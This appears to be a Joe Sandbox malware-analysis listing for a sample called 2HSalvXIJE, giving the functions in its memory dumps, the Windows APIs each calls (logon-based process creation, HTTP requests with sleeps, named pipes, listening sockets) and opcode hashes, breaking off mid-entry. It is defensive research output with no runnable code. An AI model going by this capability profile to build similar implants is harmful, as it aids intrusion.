Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID:
String ID: $<
API String ID: 0-428540627
Opcode ID: b07265f8357a11157a4f9c9ad581af4fb46f207739a0a4220b37d603b0229bef
Instruction ID: 26c574ff06f99bb5dbae2738c0461a09ad6ff7cf6ea7fb1cddea19c96054afb5
Opcode Fuzzy Hash: b07265f8357a11157a4f9c9ad581af4fb46f207739a0a4220b37d603b0229bef
Instruction Fuzzy Hash: 8892E1B2325A8087DB58CB1DE4A173AB7A5F3C8B84F44512AEB9B87794CE3CD551CB04

Function 03AA1268 Relevance: 3.0, APIs: 2, Instructions: 32processCOMMON

Download Yara Rule

APIs

CreateProcessWithLogonW.ADVAPI32 ref: 03AA12B7
GetLastError.KERNEL32 ref: 03AA12C8

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: CreateErrorLastLogonProcessWith
String ID:
API String ID: 2609480667-0
Opcode ID: 8fcebf3f7d0e2333a3ca458f2652207579a2a29baf972c8fdebcbca856c98942
Instruction ID: 257cacc2b443ef511e675c321dd0edd22cb8dcdb79a9a568d47e9809af0927bb
Opcode Fuzzy Hash: 8fcebf3f7d0e2333a3ca458f2652207579a2a29baf972c8fdebcbca856c98942
Instruction Fuzzy Hash: E401FBB6724B0482EB51CB6AE44475D33F4F709B90F14012ACE5D8B760DB3AC996C715

Function 036AF5EF Relevance: 1.8, APIs: 1, Instructions: 304COMMONLIBRARYCODE

Download Yara Rule

APIs

_initp_misc_winsig.LIBCMT ref: 036AF623

Memory Dump Source

Source File: 00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3690000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: _initp_misc_winsig
String ID:
API String ID: 2710132595-0
Opcode ID: c8c90554330dcabd03fa81e8dd660722591610607187a6cda5de2b4df199049a
Instruction ID: 67364116150617762568dbcf86e840cee0ccdf34aa8a8c397dc5ca11e4610c3e
Opcode Fuzzy Hash: c8c90554330dcabd03fa81e8dd660722591610607187a6cda5de2b4df199049a
Instruction Fuzzy Hash: C9A1DA71619A098FEF94FF75E8989AA37B2F768301321893A904AC3174DABCD585CF44

Function 03ABDBF0 Relevance: .6, Instructions: 617COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 598c92a77d3f8dda66df7f00e42631b8bb25fed254ebd76fcbad8f8343bff3d7
Instruction ID: f019218784f51a38defdd10f40bd84a5565c1f77d6728c1fb860a7dd4ca0b15c
Opcode Fuzzy Hash: 598c92a77d3f8dda66df7f00e42631b8bb25fed254ebd76fcbad8f8343bff3d7
Instruction Fuzzy Hash: 3B524EB23189458BD708CB1CE4A173AB7E1F3C9B80F44952AE78B8B799CA3DD555CB40

Function 03ABD280 Relevance: .6, Instructions: 592COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b966ddc3a4a27f87df3b0e1d0093439f08c10720c9c40116a815356078c1d6ce
Instruction ID: 43308fd147763f75c570cf5b57620831530a07186d6582f6bafafb183b54ae73
Opcode Fuzzy Hash: b966ddc3a4a27f87df3b0e1d0093439f08c10720c9c40116a815356078c1d6ce
Instruction Fuzzy Hash: 035243B23189848BD708CB1DE4A177AB7E1F3C9B80F44952AE7878B799CA3DD545CB40

Function 03A9A280 Relevance: .4, Instructions: 404COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 189dda3b3172c02751f7d6a1fb9fb386bb01c051ee0f23b30153b16a844559b7
Instruction ID: c6f33606652ca9b0ff6145f84cbbc104c3e240c94a460df5d54074c8c6be70fe
Opcode Fuzzy Hash: 189dda3b3172c02751f7d6a1fb9fb386bb01c051ee0f23b30153b16a844559b7
Instruction Fuzzy Hash: 27E1B676314A4292EF20CB29E99026E63F5F789788F94411BDF4DAB748EF39C945CB40

Function 03A99D6C Relevance: .4, Instructions: 367COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: cef86ec5338670bd8a14aab6fa368184761b45da6d7ae13d67ba864b221ae99a
Instruction ID: f8298f42d436aa5dbf517bee132cfc54971d59aa467c1db600d7f890b3d4c3d7
Opcode Fuzzy Hash: cef86ec5338670bd8a14aab6fa368184761b45da6d7ae13d67ba864b221ae99a
Instruction Fuzzy Hash: 8ED1E176308B4292EF20DB65D4902AFA7E5F788788B95011BDE4EABB18EF39C545C740

Function 03ABCF97 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa69cfbe2dfd85e7477dd7a8e83c12114f76cab9aed25d9437113f4cd473f74e
Instruction ID: 8de01e37bec78480b3593d8d2d312e40ed466823adb37bbf9f560e98c8915c8b
Opcode Fuzzy Hash: aa69cfbe2dfd85e7477dd7a8e83c12114f76cab9aed25d9437113f4cd473f74e
Instruction Fuzzy Hash: AB510BB6214A508BDB14CB1DE49076AB7E1F3CDB94F84521AE38F87768DA3CD646CB40

Function 03AC2010 Relevance: .1, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78d13f19cfb209551770b41526ff74aa754b0326c33b5d36b21e6015f5a388cd
Instruction ID: ec50037c5a0d56b9c07fee624021f447a7ada8f79ee235ac01480955b1fdad9f
Opcode Fuzzy Hash: 78d13f19cfb209551770b41526ff74aa754b0326c33b5d36b21e6015f5a388cd
Instruction Fuzzy Hash: 1D212EDBA2EBD04AEF27CFB84C6821C2F62E4A6D0634E8D9FD2C04B297E5054C05C752

Function 03AC2020 Relevance: .1, Instructions: 75COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f5400bb5268dcd121c60c6aa33d6e414217361178181f0f788fa5c58f5d558d
Instruction ID: da9a277150cabf0db158445d09ba4d90cbc869ea97f1e01f05d57386ece6e9c8
Opcode Fuzzy Hash: 8f5400bb5268dcd121c60c6aa33d6e414217361178181f0f788fa5c58f5d558d
Instruction Fuzzy Hash: A2111CDB62EBD04AEF23CFB84C6921C2F62A4A6D0634ECD9FD2C14B297E5094C05C752

Function 03AC2050 Relevance: .1, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76254ec7a075973025871a9a8c9eea873235b6d29ffa886002ac20c47e260311
Instruction ID: b7d6892a6f3ee76e400a6882c8f75b681f00e20829ace77dda2de8cba0168415
Opcode Fuzzy Hash: 76254ec7a075973025871a9a8c9eea873235b6d29ffa886002ac20c47e260311
Instruction Fuzzy Hash: 8601EC9B52EBC04AEF27CF784C6924C2F65A4A6D0634ECD9FD2C18B697E5095C06C351

Function 03AC24D8 Relevance: .0, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adc10fbe8798fb59309d57a6787c02a182fc690dc3e5826287b1290d777d3291
Instruction ID: 072de48114674a7a93b4dcc6a2094022bb482c49ed105a7cb1976ff34edd141e
Opcode Fuzzy Hash: adc10fbe8798fb59309d57a6787c02a182fc690dc3e5826287b1290d777d3291
Instruction Fuzzy Hash: 48C0125761D7C00BF722CB702DB199D2F5698A392438E448EA6C16B54BA48A08098351

Function 00402F69 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3883643343.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3883624426.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3883676568.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3883695881.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3883714058.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2HSalvXIJE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19992302b57e0ae1e896caf69d358159d2cdd7c295cfb7410856e5c68f34a958
Instruction ID: 82f505fb4451acb9e8d1e12f81e5a21f5fcc3540fe401e05c5c992db50528185
Opcode Fuzzy Hash: 19992302b57e0ae1e896caf69d358159d2cdd7c295cfb7410856e5c68f34a958
Instruction Fuzzy Hash: 62A0029244DD0290E3101B40D9413A07279D306240F0424A6421461072853D8520414C

Function 004092E4 Relevance: .0, Instructions: 3COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3883714058.0000000000409000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3883624426.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3883643343.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3883676568.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3883695881.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2HSalvXIJE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c307f67adb8aff98d3f095286b2b700dfcb55a183617c16c72d4ace8312b7d4
Instruction ID: 038cc99b61fe1a58f79dc842e8ffe6d2d7c0790616e2838ebdfb41b054369831
Opcode Fuzzy Hash: 7c307f67adb8aff98d3f095286b2b700dfcb55a183617c16c72d4ace8312b7d4
Instruction Fuzzy Hash:

Function 03AC24F0 Relevance: .0, Instructions: 3COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c307f67adb8aff98d3f095286b2b700dfcb55a183617c16c72d4ace8312b7d4
Instruction ID: 038cc99b61fe1a58f79dc842e8ffe6d2d7c0790616e2838ebdfb41b054369831
Opcode Fuzzy Hash: 7c307f67adb8aff98d3f095286b2b700dfcb55a183617c16c72d4ace8312b7d4
Instruction Fuzzy Hash:

Function 03AA6BE0 Relevance: 22.7, APIs: 15, Instructions: 195networkCOMMONLIBRARYCODE

Download Yara Rule

APIs

htonl.WS2_32 ref: 03AA6C3D
select.WS2_32 ref: 03AA6CAB
__WSAFDIsSet.WS2_32 ref: 03AA6CC3
accept.WS2_32 ref: 03AA6CE0
ioctlsocket.WS2_32 ref: 03AA6CF8
__WSAFDIsSet.WS2_32 ref: 03AA6D9B
accept.WS2_32 ref: 03AA6DB1

Part of subcall function 03AA5A20: ioctlsocket.WS2_32 ref: 03AA5A42

__WSAFDIsSet.WS2_32 ref: 03AA6E33
__WSAFDIsSet.WS2_32 ref: 03AA6E4B
closesocket.WS2_32 ref: 03AA6F0D

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: acceptioctlsocket$closesockethtonlselect
String ID:
API String ID: 2003300010-0
Opcode ID: 54efb49355ab49030012f44656aa982b574d006ff9989bba4d15e008082401ba
Instruction ID: 65fcef664d9cb7d0f37070eb51c81c52ffa8cc13f91f8acc8f3c14a39da07651
Opcode Fuzzy Hash: 54efb49355ab49030012f44656aa982b574d006ff9989bba4d15e008082401ba
Instruction Fuzzy Hash: 22915A73710B919ADB21DF29E9847AD73A5F788B94F440126DB4D4BB68DF34C264CB00

Function 03A9EC04 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 165networksleepCOMMONLIBRARYCODE

Download Yara Rule

APIs

_snprintf.LIBCMT ref: 03A9ECD3
_snprintf.LIBCMT ref: 03A9ECFE
_snprintf.LIBCMT ref: 03A9ED1A
_snprintf.LIBCMT ref: 03A9EDCF
_snprintf.LIBCMT ref: 03A9EDE6
HttpOpenRequestA.WININET ref: 03A9EE32
HttpSendRequestA.WININET ref: 03A9EE65
InternetCloseHandle.WININET ref: 03A9EE7A
Sleep.KERNEL32 ref: 03A9EE85
InternetCloseHandle.WININET ref: 03A9EE98

Strings

%s%s, xrefs: 03A9EDDB
*/*, xrefs: 03A9EC2A

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: _snprintf$CloseHandleHttpInternetRequest$OpenSendSleep
String ID: %s%s$*/*
API String ID: 3787158362-856325523
Opcode ID: 74fcd7c73aed85367ed650ea4945df165b3c67cd5a727985712ddaae692fa4ee
Instruction ID: 01cf2b3f62e3113c41150df653d80593e498c27bc3b14510820ae12e9129b13d
Opcode Fuzzy Hash: 74fcd7c73aed85367ed650ea4945df165b3c67cd5a727985712ddaae692fa4ee
Instruction Fuzzy Hash: 0771CE76300B848AEF00DF65E98079A73A4F389788F440627DA8E57B65DF3CC609C700

Function 03AA53E4 Relevance: 18.1, APIs: 12, Instructions: 105pipesleepfileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 03AA55E4
GetTickCount.KERNEL32 ref: 03AA55F0
CreateFileA.KERNEL32 ref: 03AA561E
GetLastError.KERNEL32 ref: 03AA562D
WaitNamedPipeA.KERNEL32 ref: 03AA5642
Sleep.KERNEL32 ref: 03AA564F
GetTickCount.KERNEL32 ref: 03AA5655
GetLastError.KERNEL32 ref: 03AA566B
GetLastError.KERNEL32 ref: 03AA5683
SetNamedPipeHandleState.KERNEL32 ref: 03AA56AE
GetLastError.KERNEL32 ref: 03AA56B8
DisconnectNamedPipe.KERNEL32 ref: 03AA5732

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: ErrorLast$CountNamedPipeTick$CreateDisconnectFileHandleSleepStateWait
String ID:
API String ID: 34948862-0
Opcode ID: fe9bced31039d2455b0d079955692a562236962e25bf66d1b7588840a9b4026e
Instruction ID: 5ffba4b849d724558219c11b703f162030fcb842efa85c36aa600a5248328698
Opcode Fuzzy Hash: fe9bced31039d2455b0d079955692a562236962e25bf66d1b7588840a9b4026e
Instruction Fuzzy Hash: D441BC36B00F00C6EB01DF65E84476D33B9E78ABA4F485A26DEAA57BA4DF38C544C305

Function 03AAFF6C Relevance: 18.1, APIs: 12, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32 ref: 03AAFF7D
free.LIBCMT ref: 03AAFF9A

Part of subcall function 03AAF244: HeapFree.KERNEL32 ref: 03AAF25A
Part of subcall function 03AAF244: _errno.LIBCMT ref: 03AAF264
Part of subcall function 03AAF244: GetLastError.KERNEL32 ref: 03AAF26C

free.LIBCMT ref: 03AAFFAF
free.LIBCMT ref: 03AAFFD0
free.LIBCMT ref: 03AAFFE5
free.LIBCMT ref: 03AAFFF9
free.LIBCMT ref: 03AB0005
free.LIBCMT ref: 03AB0030
EncodePointer.KERNEL32 ref: 03AB0038
free.LIBCMT ref: 03AB0051
free.LIBCMT ref: 03AB006A
free.LIBCMT ref: 03AB009B

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: free$Pointer$DecodeEncodeErrorFreeHeapLast_errno
String ID:
API String ID: 4099253644-0
Opcode ID: f2c387d57ff385ba375dc00a6173171a26f2c39e06d74853e0125178de0f68c4
Instruction ID: 7f3f1bf9bc5ce90d16f3cb8726e707141f66d72f324431abe7a5190003bafa23
Opcode Fuzzy Hash: f2c387d57ff385ba375dc00a6173171a26f2c39e06d74853e0125178de0f68c4
Instruction Fuzzy Hash: 2231D02A351A4489EE1FEB55ED5436963A8BB46B95F0C052ACD9B0B7A0DF7CC144C312

Function 03AAFE10 Relevance: 18.1, APIs: 12, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 03AAFE36

Part of subcall function 03AB1D18: _getptd_noexit.LIBCMT ref: 03AB1D1C

_invalid_parameter_noinfo.LIBCMT ref: 03AAFE42
__crtIsPackagedApp.LIBCMT ref: 03AAFE53
AreFileApisANSI.KERNEL32 ref: 03AAFE62
MultiByteToWideChar.KERNEL32 ref: 03AAFE88
GetLastError.KERNEL32 ref: 03AAFE95
_dosmaperr.LIBCMT ref: 03AAFE9D

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: ApisByteCharErrorFileLastMultiPackagedWide__crt_dosmaperr_errno_getptd_noexit_invalid_parameter_noinfo
String ID:
API String ID: 1138158220-0
Opcode ID: 05425721233f79f79091f3b96a0ee25a442efda7d0ba0e08876b468a33414fe7
Instruction ID: f9f140a956fffbe82a624087e538a29a64cfa45243eeb6764287c96bbcaab657
Opcode Fuzzy Hash: 05425721233f79f79091f3b96a0ee25a442efda7d0ba0e08876b468a33414fe7
Instruction Fuzzy Hash: B321C736310F408AEB29EF3AED1432DA7E9EB89B94F18462ADE4547796DF3CC1408301

Function 03AA7308 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 03AA7336
select.WS2_32 ref: 03AA738D
__WSAFDIsSet.WS2_32 ref: 03AA739C
